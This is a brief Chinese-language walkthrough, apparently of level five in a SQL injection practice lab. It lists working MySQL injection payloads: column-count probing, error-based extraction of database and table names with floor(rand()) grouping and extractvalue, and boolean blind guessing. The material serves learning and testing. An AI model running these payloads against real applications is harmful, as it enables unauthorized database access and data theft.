第五关
第一种:非常复杂,我也没太搞明白
order by 3正常,order by 4异常
’ union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a–+
查数据库名
union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security’limit 0,1),floor(rand()*2))as a from information_schema.tables group by a–+
查表名
第二种:猜库名,表名
id=1’ and left(database(),1)=‘a’–+
第三种:?id=1’ and (extractvalue(‘anything’,concat(’~’,(select database()))))-- -